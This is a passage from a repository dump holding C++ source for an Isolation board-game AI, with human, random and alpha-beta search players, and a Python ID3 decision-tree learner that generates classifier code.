"max_line_length": 94,
"num_lines": 50,
"path": "/isolation/src/human.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef HUMAN_H_\n#define HUMAN_H_\n\n#include <sstream>\n#include \"game.h\"\n#include \"types.h\"\n#include \"player.h\"\n\nclass HumanPlayer : public Player\n{\n private:\n\tbool parse_string(string str, int *row, int *col) {\n\t\tistringstream iss(str);\n\t\tiss >> *row >> *col >> std::ws;\n\t\tif (iss.fail() || !iss.eof())\n\t\t\treturn false;\n\t\telse\n\t\t\treturn true;\n\t}\n\n public:\n HumanPlayer(string name) : Player(name) {}\n\n\tvirtual Position Move(Board board, Position my, Position her)\n\t{\n\t\t\n\t\tif (IsDead(board, my)) {\n\t\t\tcout << \"I have no way to go...\" << endl;\n\t\t\treturn Position(-1, -1);\n\t\t}\n\n\t\tint row, col;\n\t\tcout << \">>\";\n\n\t\tstring str;\n\t\tgetline(cin, str);\n\n\t\t// Validate the move\n\t\twhile (!parse_string(str, &row, &col) || !ValidateMove(board, my, Position(row-1, col-1))) {\n\t\t\tcout << \"Invalid move, please try again.\" << endl;\n\t\t\tcout << \">>\";\n\t\t\tgetline(cin, str);\n\t\t}\n\t\treturn Position(row-1, col-1);\n\t}\n\n};\n\n\n#endif // HUMAN_H_\n"
},
{
"alpha_fraction": 0.5888993144035339,
"alphanum_fraction": 0.6152398586273193,
"avg_line_length": 17.327587127685547,
"blob_id": "c198dbde75875e420a5959ac0600425b0f8b5214",
"content_id": "aba05994550b9da278a82e42667ee19427490fc8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1063,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 58,
"path": "/isolation/src/game.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef GAME_H_\n#define GAME_H_\n\n#include <vector>\n\n#include \"types.h\"\n#include \"player.h\"\n\nconst int kBoardSize = 8;\nconst Board kInvalidBoard = 0L;\nconst char kFirstSymbol = 'x';\nconst char kSecondSymbol = 'o';\nconst Position kFirstPos(0,0);\nconst Position kSecondPos(7,7);\n\nconst int kOffsets[8][2] = {\n\t{-1,0},{1,0},{0,-1},{0,1},\n\t{-1,-1},{-1,1},{1,-1},{1,1}};\n\n\n/*******************************************\n * Utilities\n ******************************************/\nbool ValidateMove(Board board, Position current, Position move);\nbool IsDead(Board board, Position pos);\nstd::vector<Action> GenerateActions(Board board, Position cur);\n\nclass Player;\n\nclass Game\n{\n private:\n\tBoard board_;\n\tPosition positions_[2];\n\tPlayer *players_[2];\n\n\tvoid ApplyMove(int mover, Position move);\n\tvoid Gameover(int mover);\n\n public:\n\n\tGame();\n\n\t~Game();\n\n\tvoid AddFirstPlayer(Player *player) {\n\t\tplayers_[0] = player;\n\t}\n\tvoid AddSecondPlayer(Player *player) {\n\t\tplayers_[1] = player;\n\t}\n\t\n\t// return the index of the winner\n\tint Play();\n\tvoid Print();\n};\n\n#endif // GAME_H_\n"
},
{
"alpha_fraction": 0.5647441744804382,
"alphanum_fraction": 0.5748780369758606,
"avg_line_length": 28.171533584594727,
"blob_id": "1679dca18acdf1f4e9779d277c97b57f8faed065",
"content_id": "4f9ddf7c90998e389101f63927bbcee7f8d3fdc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7993,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 274,
"path": "/decision/learn.py",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\nimport sys\nfrom math import log\n\nval2id = [] # maps value to id\nid2val = [] # maps id to value\n\nclass DecisionTree:\n def __init__(self, pivot):\n self.pivot = pivot\n self.children = []\n\n def __str__(self):\n import StringIO\n s = StringIO.StringIO()\n print_tree(self, s)\n return s.getvalue()\n\n def add_child(self, child):\n self.children.append(child)\n\ndef print_tree(tree, output=sys.stdout):\n f = output\n def _print_tree(tree, level):\n f.write('\\t' * level)\n if isleaf(tree):\n f.write(id2val[-1][tree] + '\\n')\n else:\n f.write('*'+str(tree.pivot)+'*:\\n')\n for c in enumerate(tree.children):\n f.write('\\t' * level)\n f.write('<'+id2val[tree.pivot][c[0]]+'>\\n')\n _print_tree(c[1], level+1)\n \n _print_tree(tree, 0)\n\ndef isleaf(tree):\n return not isinstance(tree, DecisionTree)\n\nclass Codegen:\n def __init__(self, outfile):\n self.outfile = outfile\n self.indent = 0\n \n def fill(self, text=''):\n self.f.write('\\n' + self.indent * '\\t' + text)\n\n def write(self, text):\n self.f.write(text)\n\n def enter(self):\n self.indent += 1\n\n def leave(self):\n self.indent -= 1\n \n def gen_header(self):\n self.write('#!/usr/bin/python\\n')\n self.write('import sys\\n')\n self.fill()\n\n def gen_main(self):\n self.fill(\"if __name__=='__main__':\")\n self.enter()\n self.fill(\"if len(sys.argv) != 2:\")\n self.enter()\n self.fill(\"print 'Usage: python \" + self.outfile + \" testfile'\")\n self.fill(\"sys.exit(1)\")\n self.leave() # leave if\n self.fill(\"testfile=sys.argv[1]\")\n self.fill('lines = open(testfile).readlines()')\n self.fill('for line in lines:')\n self.enter()\n self.fill(\"record = [field.strip() for field in line.split(',')]\")\n self.fill(\"print 'Classifying:', record\") \n self.fill(\"result=classify(record)\")\n self.fill(\"print '-->', result\")\n self.leave() # leave for\n self.leave() # leave if __main__\n self.fill()\n\n def gen_func(self, tree):\n self.fill('def classify(record):')\n self.enter()\n self.gen_classify(tree)\n self.leave() # leave def\n self.fill()\n\n # recursively call gen_classify to generate code\n # only need to change the indentation level\n def gen_classify(self, tree):\n if isleaf(tree):\n self.fill('return \"' + str(id2val[-1][tree]) + '\"')\n return\n values = id2val[tree.pivot]\n for idx in range(len(values)):\n if (idx == 0):\n self.fill(str.format('if record[%d]==\"%s\":' % (tree.pivot, values[idx])))\n else:\n self.fill(str.format('elif record[%d]==\"%s\":' % (tree.pivot, values[idx])))\n self.enter()\n self.gen_classify(tree.children[idx])\n self.leave()\n\n\n # generate code for this decision tree \n # the code generated is a single function\n # that consists mostly of branches\n # the essence is to encode the tree model\n # into your code, instead of the other way around\n def gencode(self, tree):\n self.f = open(self.outfile, 'w')\n self.gen_header()\n self.gen_func(tree)\n self.gen_main()\n self.f.close()\n\ndef majority(examples):\n # generic majority\n count = [0] * len(id2val[-1])\n for example in examples:\n count[example[-1]] += 1\n return count.index(max(count))\n\ndef all_same(examples):\n assert examples\n result = examples[0][-1]\n for example in examples[1:]:\n if example[-1] != result: return False\n return True\n\n# generic count\ndef count_value(examples, attr, val):\n return len(filter(lambda x : x[attr]==val, examples))\n\n \n# def count_positive(examples):\n# return len(filter(lambda x : x[-1]==1, examples))\n# def count_negative(examples):\n# return len(filter(lambda x 
: x[-1]==0, examples))\n\n\ndef importance(examples, attr):\n # generic entrophy\n def entrophy(hist):\n total = sum(hist)\n hist = filter(lambda x : x > 0, hist)\n qs = [1.0 * h / total for h in hist]\n e = -sum([q * log(q, 2) for q in qs])\n return e\n\n # def boolean_entrophy(p, n):\n # if p == 0 or n == 0: return 0 # entropy is 0\n # q = 1.0 * p / (p + n)\n # e = -(q*log(q,2) + (1-q)*log(1-q,2))\n # print e, entrophy([p, n])\n # assert entrophy([p, n]) == e\n # return e\n\n remainder = 0\n d = len(val2id[attr])\n goals = len(val2id[-1])\n for k in range(d):\n exsi = select(examples, attr, k)\n\n hist = [count_value(exsi, -1, v) for v in range(goals)]\n # positives = count_positive(exsi)\n # negatives = count_negative(exsi)\n # e = 1.0 * len(exsi) / len(examples) \\\n # * boolean_entrophy(positives, negatives)\n e = 1.0 * len(exsi) / len(examples) \\\n * entrophy(hist)\n remainder += e\n\n hist = [count_value(examples, -1, v) for v in range(goals)]\n gain = entrophy(hist) - remainder\n\n # positives = count_positive(examples)\n # negatives = count_negative(examples)\n # gain = boolean_entrophy(positives, negatives) - remainder\n return gain\n \ndef select(examples, attr, val):\n match = filter(lambda x: x[attr]==val, examples)\n return match\n\ndef decision_tree_learning(examples, attributes, parent_examples):\n if not examples: return majority(parent_examples)\n if all_same(examples): return examples[0][-1]\n if not attributes: return majority(examples)\n\n gains = [importance(examples, attr) for attr in attributes]\n pivot = attributes[gains.index(max(gains))]\n \n tree = DecisionTree(pivot)\n d = len(val2id[pivot])\n for k in range(d):\n exs = select(examples, pivot, k)\n nattributes = filter(lambda x: x != pivot, attributes)\n subtree = decision_tree_learning(exs, nattributes, examples)\n assert isinstance(subtree, DecisionTree) or isinstance(subtree, int)\n tree.add_child(subtree)\n return tree\n \n\ndef print_examples(examples):\n for example in examples:\n print decode(example)\n\ndef decode(example):\n record = [id2val[item[0]][item[1]] for item in enumerate(example)]\n return record\n\ndef encode(record):\n global val2id, id2val\n example = []\n for f in range(len(record)):\n domain = val2id[f]\n coding = domain.get(record[f], len(domain))\n if coding == len(domain):\n val2id[f].update({record[f]:coding})\n id2val[f].update({coding:record[f]})\n example.append(coding)\n return example\n\ndef read_data(datafile):\n global val2id, id2val\n examples = []\n lines = open(datafile).readlines()\n assert lines\n\n fields = len(lines[0].split(','))\n # initialize domain mapping\n val2id = [{} for i in range(fields)]\n id2val = [{} for i in range(fields)]\n\n for line in lines:\n # extract the record\n record = [field.strip() for field in line.split(',')]\n # encode record with integer category\n example = encode(record)\n examples.append(example)\n return examples\n\ndef classify(tree, record):\n example = encode(record)\n while isinstance(tree, DecisionTree):\n child = example[tree.pivot]\n tree = tree.children[child]\n result = id2val[-1][tree]\n assert result == record[-1]\n return result\n\n\nif __name__=='__main__':\n if len(sys.argv) < 3:\n print \"Usage: python learn.py training_data output_file\"\n sys.exit(1)\n\n training = sys.argv[1]\n outfile = sys.argv[2]\n\n examples = read_data(training)\n\n attributes = list(range(len(id2val)-1))\n tree = decision_tree_learning(examples, attributes, None)\n\n print tree\n\n codegen = Codegen(outfile)\n codegen.gencode(tree)\n\n print 
\"Classifier generated in: \", outfile\n"
},
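learn.py's Codegen above compiles the learned tree into a standalone classify() function built from nested if/elif branches, one branch per attribute value. For illustration, this is the shape of output it would emit for a small two-attribute tree; the attribute values below are invented, not taken from any real training data.

    # Invented example of Codegen output: the learned tree is baked into
    # branches; record[0] and record[1] are the pivots chosen during learning.
    def classify(record):
        if record[0] == "sunny":
            if record[1] == "high":
                return "no"
            elif record[1] == "normal":
                return "yes"
        elif record[0] == "rain":
            return "yes"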
{
"alpha_fraction": 0.517241358757019,
"alphanum_fraction": 0.5287356376647949,
"avg_line_length": 13.5,
"blob_id": "c182a546bc0ccc041f61791d547eec637e4b8160",
"content_id": "f93d1a50f392398f1f5c749dfecbb60e6e60bbf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 6,
"path": "/isolation/src/Makefile",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "CC=g++\nCFLAGS=-Wall -O3\nLIBS=-lm\n\nall : *.cc *.h\n\t$(CC) -o test $(CFLAGS) *.cc $(LIBS)\n"
},
{
"alpha_fraction": 0.6816479563713074,
"alphanum_fraction": 0.6816479563713074,
"avg_line_length": 13.052631378173828,
"blob_id": "4989db386cab9ae795469f9a5334c60f3510a7cc",
"content_id": "1f7fa6bc0a8439528f6357335fbe66a9562cfab0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 267,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 19,
"path": "/isolation/src/dumb.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef DUMB_H_\n#define DUMB_H_\n\n#include \"player.h\"\n\nclass DumbPlayer : public Player\n{\n public:\n DumbPlayer(string name) : Player(name) {}\n\n\tvirtual Position Move(Board board, Position my, Position her)\n\t{\n\t\treturn RandomMove(board, my);\n\t}\n\n};\n\n\n#endif // DUMB_H_\n"
},
{
"alpha_fraction": 0.7331863045692444,
"alphanum_fraction": 0.7436603903770447,
"avg_line_length": 23.849315643310547,
"blob_id": "941d77bffa2c55d91fad9b63b577153412160c04",
"content_id": "713e27f151e010794f409248377c405bd47e6716",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1814,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 73,
"path": "/isolation/src/nplayer.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef AGGR_PLAYER_H_\n#define AGGR_PLAYER_H_\n\n#include <cassert>\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <stdlib.h>\n\n#include \"game.h\"\n#include \"types.h\"\n#include \"table.h\"\n#include \"player.h\"\n\nusing namespace std;\n\nclass Game;\n\nclass AggressivePlayer : public Player\n{\n private:\n\tstatic const int kMidGameSteps = 5;\n\tstatic const int kEndGameSteps = 10;\n\n\tstatic const int kEagerGameSteps = 15;\n\n\tstatic const int kMaxDFSDepth = 20;\n\n\tstatic const int kDefaultMaxDepth = 5;\n\tstatic const int kMidGameMaxDepth = 7;\n\tstatic const int kEndGameMaxDepth = 11;\n\n\tstatic const unsigned int kMaxIsolationNodes = 100000;\n\n\tdouble Eval2(Board board, Position my, Position her);\n\tdouble Eval(Board board, Position my, Position her, int depth);\n\tbool Cutoff(Board board, Position my, Position her, int depth);\n\n\tPosition AlphaBeta(Board board, Position my, Position her);\n\n\tScoreAction MaxValue(Board board, Position my, Position her,\n\t\t\t\t\t\t double alpha, double beta, int depth);\n\n\tScoreAction MinValue(Board board, Position my, Position her,\n\t\t\t\t\t\t double alpha, double beta, int depth);\n\n bool IsIsolated(Board board, Position my, Position her);\n\tint MaxClosureDFS(Board board, Position cur, int depth, int maxdepth);\n\tint MaxClosure(Board board, Position cur);\n\tPosition LocalMove(Board board, Position my);\n\tint DoLocalMove(Board board, Position cur);\n\n\tTable table_;\n\n\tbool isolated_;\n\tint hersteps_;\n\n\tint steps_;\n\n public:\n AggressivePlayer(string name) : Player(name), isolated_(false), hersteps_(IMAX), steps_(0) {}\n\n\tvirtual Position Move(Board board, Position my, Position her);\n\n};\n\n\nBoard TryMove(Board board, Position cur, Direction dir, unsigned int nsteps);\nPosition MakeMove(Position cur, Action action);\nPosition RandomMove(Board board, Position current);\n\n\n#endif // PLAYER_H_\n"
},
{
"alpha_fraction": 0.6517701745033264,
"alphanum_fraction": 0.6579222083091736,
"avg_line_length": 21.909574508666992,
"blob_id": "f8f9b379aabdfe5638ea65cefd49e3b380618ab9",
"content_id": "573f4f993f8593a100750e1966aeb6868ac6d90b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8615,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 376,
"path": "/isolation/src/player.cc",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <limits>\n#include <queue>\n#include <set>\n#include <stdio.h>\n#include <stdlib.h>\n\n#include \"types.h\"\n#include \"player.h\"\n#include \"game.h\"\n#include \"table.h\"\n#include \"util.h\"\n\nusing namespace std;\n\nPosition RandomMove(Board board, Position current)\n{\n\tvector<Action> actions = GenerateActions(board, current);\n\tif (actions.empty()) {\n\t\treturn Position(-1, -1);\n\t}\n\telse {\n\t\tAction action = actions[rand() % actions.size()];\n\t\treturn MakeMove(current, action);\n\t}\n}\n\n\nbool MyPlayer::IsIsolated(Board board, Position my, Position her)\n{\n\t// check the table first\n\tint lookup = table_.isolated(board, my, her);\n\n\tif (lookup == 1)\n\t\treturn true;\n\telse if (lookup == -1)\n\t\treturn false;\n\t\n\t// BFS\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, my, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, my));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps)\n\t\t\tmaxsteps = node.depth;\n\t\tfrontier.pop();\n\n\t\t// cutoff\n\t\tif (frontier.size() > kMaxIsolationNodes)\n\t\t\treturn false;\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\t\t\t// we are reachable\n\t\t\tif (next == her) {\n\t\t\t\ttable_.insert(board,my,her,false);\n\t\t\t\treturn false;\n\t\t\t}\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))\n\t\t\t\t&& visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t}\n\t\t}\n\t}\n\n\ttable_.insert(board,my,her,true);\n\treturn true;\n}\n\n\n// return the maximum number of steps\n// conditioned on that we are isolated\n// this is deterministic\nint MyPlayer::MaxClosure(Board board, Position cur)\n{\n\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, cur, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, cur));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps)\n\t\t\tmaxsteps = node.depth;\n\n\t\tfrontier.pop();\n\n\t\t// cutoff\n\t\tif (frontier.size() > kMaxIsolationNodes)\n\t\t\treturn (int)(maxsteps * 1.2); // relax\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))) {\n\t\t\t\tif (visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn maxsteps;\n}\n\nBoard TryMove(Board board, Position cur, Direction dir, unsigned int nsteps)\n{\n\tint row = cur.row, col = cur.col;\n\tint ro = kOffsets[dir][0];\n\tint co = kOffsets[dir][1];\n\t\n\tint rend = row + ro*nsteps;\n\tint cend = col + co*nsteps;\n\n\tBoard nboard = board;\n\tif (rend < 0 || cend < 0 ||\n\t\trend >= kBoardSize || cend >= kBoardSize)\n\t\treturn kInvalidBoard;\n\n\tfor (unsigned int step = 1; step <= nsteps; step++) {\n\t\tint r = row + ro * step, c = col + co * step;\n\t\tif (getpos(board, r, c)) {\n\t\t\treturn kInvalidBoard;\n\t\t}\n\t}\n\tsetpos(nboard, rend, cend);\n\n\treturn nboard;\n}\n\nPosition MakeMove(Position cur, Action 
action)\n{\n\tint row = cur.row, col = cur.col;\n\tint ro = kOffsets[action.dir][0];\n\tint co = kOffsets[action.dir][1];\n\n\treturn Position(row+ro*action.steps, col+co*action.steps);\n}\n\n// Estimate the likelihood that we are isolated\n// and she controls more squres than me\ndouble MyPlayer::Eval(Board board, Position my, Position her)\n{\n\t// Version 1:\n\t// number of empty slots I can move / number of slots she can move\n\n\tvector<Action> myactions = GenerateActions(board, my);\n\tvector<Action> heractions = GenerateActions(board, her);\n\n\t// she cannot move\n\t// we win!\n\tif (heractions.size() == 0)\n\t\treturn DMAX;\n\n\treturn 1.0 * myactions.size() / heractions.size();\n}\n\n\nbool MyPlayer::Cutoff(Board board, Position my, Position her, int depth)\n{\n\treturn (depth > kMaxDepth);\n}\n\n\nint MyPlayer::DoLocalMove(Board board, Position cur)\n{\n\tqueue<BfsNode> frontier;\n\tfrontier.push(BfsNode(board, cur, 0));\n\n\tstd::set<BfsNode, BfsNodeCompare> visited;\n\tvisited.insert(BfsNode(board, cur));\n\n\tint maxsteps = 0; // keep max steps I left\n\twhile (!frontier.empty()) {\n\t\tBfsNode node = frontier.front();\n\t\tif (node.depth > maxsteps) {\n\t\t\tmaxsteps = node.depth;\n\t\t\t\n\t\t\t// early termination\n\t\t\tif (maxsteps > hersteps_) \n\t\t\t\treturn maxsteps;\n\t\t}\n\n\t\tfrontier.pop();\n\n\t\tfor (int d = 0; d < 8; d++) {\n\t\t\tPosition next = MakeMove(node.cur, Action((Direction)d, 1));\n\n\t\t\tBoard nboard;\n\t\t\tif ((nboard=TryMove(node.board, node.cur, (Direction)d, 1))) {\n\t\t\t\tif (visited.find(BfsNode(nboard, next))==visited.end()) {\n\t\t\t\t\tfrontier.push(BfsNode(nboard, next, node.depth+1));\n\t\t\t\t\tvisited.insert(BfsNode(nboard, next));\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn maxsteps;\n}\n\n\n// Find the next best local move\nPosition MyPlayer::LocalMove(Board board, Position my)\n{\n\t//\tcout << \"Local move start\" << endl;\n\tPosition best = Position(-1,-1);\n\tint maxsteps = 0;\n\tfor (int d = 0; d < 8; d++) {\n\t\tPosition next = MakeMove(my, Action((Direction)d, 1));\n\t\tBoard nboard=TryMove(board, my, (Direction)d, 1);\n\t\tif (nboard) {\n\t\t\tint steps = DoLocalMove(nboard, next);\n\t\t\tif (steps >= maxsteps) {\n\t\t\t\tmaxsteps = steps;\n\t\t\t\tbest = next;\n\t\t\t\tif (steps > hersteps_) // we only need to do better than her\n\t\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\thersteps_--;\n\t//\tcout << \"Local move end\" << endl;\n\treturn best;\n}\n\n\n\nPosition MyPlayer::AlphaBeta(Board board, Position my, Position her)\n{\n\tdouble alpha = DMIN;\n\tdouble beta = DMAX;\n\n\tScoreAction sa = MaxValue(board, my, her, alpha, beta, 0);\n\n\tif (sa.action.steps == -1) {\n\t\tcout << \"We will lose. 
But try our best.\" << endl;\n\t\treturn LocalMove(board, my);\n\t}\n\n\tif (TryMove(board, my, sa.action.dir, sa.action.steps)) {\n\t\treturn MakeMove(my, sa.action);\n\t}\n\telse {\n\t\treturn Position(-1, -1);\n\t}\n}\n\nScoreAction MyPlayer::MaxValue(Board board, Position my, Position her,\n\t\t\t\t\t\t\t double alpha, double beta, int depth)\n{\n\t// I lose\n\tif (IsDead(board, my))\n\t\treturn ScoreAction(DMIN, kInvalidAction);\n\n\t// She lose\n\tif (IsDead(board, her)) {\n\t\tvector<Action> actions = GenerateActions(board, my);\n\t\treturn ScoreAction(DMAX, actions[0]);\n\t}\n\n\t// Cutoff test\n\tif (Cutoff(board, my, her, depth))\n\t\treturn ScoreAction(Eval(board, my, her), kInvalidAction);\n\n\tAction maxaction = kInvalidAction;\n\tvector<Action> actions = GenerateActions(board, my);\n\n\twhile (!actions.empty()) {\n\t\tint index = rand() % actions.size();\n\t\tAction action = actions[index];\n\t\tactions.erase(actions.begin()+index);\n\n\t\tDirection d = action.dir;\n\t\tint steps = action.steps;\n\t\tPosition npos = MakeMove(my, action);\n\n\t\tBoard nboard;\n\t\tdouble score;\n\t\tif (!(nboard = TryMove(board, my, d, steps)))\n\t\t\tcontinue;\n\n\t\tscore = MinValue(nboard, npos, her, alpha, beta, depth+1).score;\n\n\t\tif (score > alpha) {\n\t\t\talpha = score;\n\t\t\tmaxaction = Action(d,steps);\n\t\t}\n\n\t\tif (alpha >= beta)\n\t\t\treturn ScoreAction(alpha, maxaction);\n\t}\n\n\treturn ScoreAction(alpha, maxaction);\n}\n\n\nScoreAction MyPlayer::MinValue(Board board, Position my, Position her,\n\t\t\t\t\t\t\t double alpha, double beta, int depth)\n{\n\t// She lose\n\tif (IsDead(board, her))\n\t\treturn ScoreAction(DMAX, kInvalidAction);\n\n\t// I lose\n\tif (IsDead(board, my)) {\n\t\tvector<Action> actions = GenerateActions(board, her);\n\t\treturn ScoreAction(DMIN, actions[0]);\n\t}\n\n\t// Cutoff test\n\tif (Cutoff(board, my, her, depth))\n\t\treturn ScoreAction(Eval(board, her, my), kInvalidAction);\n\n\tAction minaction = kInvalidAction;\n\tvector<Action> actions = GenerateActions(board, her);\n\n\twhile (!actions.empty()) {\n\t\tint index = rand() % actions.size();\n\t\tAction action = actions[index];\n\t\tactions.erase(actions.begin()+index);\n\n\t\tDirection d = action.dir;\n\t\tint steps = action.steps;\n\t\tPosition npos = MakeMove(her, action);\n\n\t\tBoard nboard;\n\t\tdouble score;\n\t\tif (!(nboard = TryMove(board, her, d, steps))) // she tries to move\n\t\t\tcontinue;\n\n\t\tscore = MaxValue(nboard, my, npos, alpha, beta, depth+1).score;\n\n\t\tif (score < beta) {\n\t\t\tbeta = score;\n\t\t\tminaction = Action(d, steps);\n\t\t}\n\n\t\tif (beta <= alpha)\n\t\t\treturn ScoreAction(beta, minaction);\n\t}\n\n\treturn ScoreAction(beta, minaction);\n}\n\n\nPosition MyPlayer::Move(Board board, Position my, Position her)\n{\n\tif (isolated_) // if isolated, do local move!\n\t\treturn LocalMove(board, my);\n\telse { // otherwise, adversial game!\n\t\t// check isolation\n\n\t\tbool test = IsIsolated(board, my, her);\n\t\tif (test) {\n\t\t\tcout << \"Switching to local mode.\" << endl;\n\t\t\tisolated_ = true;\n\t\t\thersteps_ = MaxClosure(board, her);\n\t\t\treturn LocalMove(board, my);\n\t\t}\n\t\telse\n\t\t\treturn AlphaBeta(board, my, her);\n\t}\n}\n\n"
},
{
"alpha_fraction": 0.5350978374481201,
"alphanum_fraction": 0.5466052889823914,
"avg_line_length": 17.10416603088379,
"blob_id": "fe8eee3ffe25695b4c18384ea2295a97fc9d489a",
"content_id": "1557e6e51674e30fed12995e307e4a0df512cc00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 869,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 48,
"path": "/isolation/src/util.cc",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include \"util.h\"\n#include \"game.h\"\n#include \"types.h\"\n\nusing namespace std;\n\nbool getpos(Board board, int row, int col)\n{\n\tint shift = row * 8 + col;\n\treturn (board >> shift) & 1L;\n}\n\nvoid setpos(Board &board, int row, int col)\n{\n\tint shift = row * 8 + col;\n\tboard |= (1L << shift);\n}\n\n\nvoid print(Board board, Position playerA, Position playerB)\n{\n\n\t// print column header\n\tfor (int c = 0; c < kBoardSize; c++) {\n\t\tif (c==0)\n\t\t\tcout << \" \";\n\t\tcout << \" \" << c + 1;\n\t}\n\tcout << endl;\n\n\n\tfor (int r = 0; r < kBoardSize; r++) {\n\t\tcout << r + 1;\n\t\tfor (int c = 0; c < kBoardSize; c++) {\n\t\t\tcout << \" \";\n\t\t\tif (playerA.row == r && playerA.col == c)\n\t\t\t\tcout << kFirstSymbol;\n\t\t\telse if (playerB.row == r && playerB.col == c)\n\t\t\t\tcout << kSecondSymbol;\n\t\t\telse if (getpos(board, r, c))\n\t\t\t\tcout << '*';\n\t\t\telse\n\t\t\t\tcout << '-';\n\t\t}\n\t\tcout << endl;\n\t}\n}\n"
},
{
"alpha_fraction": 0.7186973690986633,
"alphanum_fraction": 0.7243121862411499,
"avg_line_length": 21.262500762939453,
"blob_id": "855c5bdfe1dc1f3043caabc476d67e8ae0297f91",
"content_id": "e31ba2e0ff0eb653b0b7f62a0b23aad973069fce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1781,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 80,
"path": "/isolation/src/player.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef PLAYER_H_\n#define PLAYER_H_\n\n#include <cassert>\n#include <iostream>\n#include <vector>\n#include <queue>\n#include <stdlib.h>\n\n#include \"game.h\"\n#include \"types.h\"\n#include \"table.h\"\n\nusing namespace std;\n\nclass Game;\n\nclass Player\n{\n protected:\n\tstring name_;\n public:\n\tPlayer(string name) {\n\t\tname_ = name;\n\t}\n\tvirtual ~Player() {}\n\n\tstring name() { return name_; }\n\tvirtual Position Move(Board board, Position my, Position her) = 0;\n};\n\n\nclass MyPlayer : public Player\n{\n private:\n\tstatic const int kDefaultMaxDepth = 5;\n\tstatic const unsigned int kMaxIsolationNodes = 100000;\n\t\n\tint kMaxDepth;\n\n\tdouble Eval(Board board, Position my, Position her);\n\tbool Cutoff(Board board, Position my, Position her, int depth);\n\n\tPosition AlphaBeta(Board board, Position my, Position her);\n\n\tScoreAction MaxValue(Board board, Position my, Position her,\n\t\t\t\t\t\t double alpha, double beta, int depth);\n\n\tScoreAction MinValue(Board board, Position my, Position her,\n\t\t\t\t\t\t double alpha, double beta, int depth);\n\n bool IsIsolated(Board board, Position my, Position her);\n\tint MaxClosure(Board board, Position cur);\n\tPosition LocalMove(Board board, Position my);\n\tint DoLocalMove(Board board, Position cur);\n\n\tTable table_;\n\n\tbool isolated_;\n\tint hersteps_;\n\n public:\n MyPlayer(string name) : Player(name), kMaxDepth(kDefaultMaxDepth), isolated_(false), hersteps_(IMAX) {}\n\n MyPlayer(string name, int maxDepth) : Player(name), kMaxDepth(maxDepth), isolated_(false), hersteps_(IMAX)\n\t{\n\t\tassert(maxDepth % 2 != 0);\n\t}\n\n\tvirtual Position Move(Board board, Position my, Position her);\n\n};\n\n\nBoard TryMove(Board board, Position cur, Direction dir, unsigned int nsteps);\nPosition MakeMove(Position cur, Action action);\nPosition RandomMove(Board board, Position current);\n\n\n#endif // PLAYER_H_\n"
},
{
"alpha_fraction": 0.580777108669281,
"alphanum_fraction": 0.5879345536231995,
"avg_line_length": 25.432432174682617,
"blob_id": "48b6e3fb3e0850aa05015074cd3a7dd79246bf79",
"content_id": "badc5ca8aaf9edc609ac93996cb8979e886db4a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 978,
"license_type": "no_license",
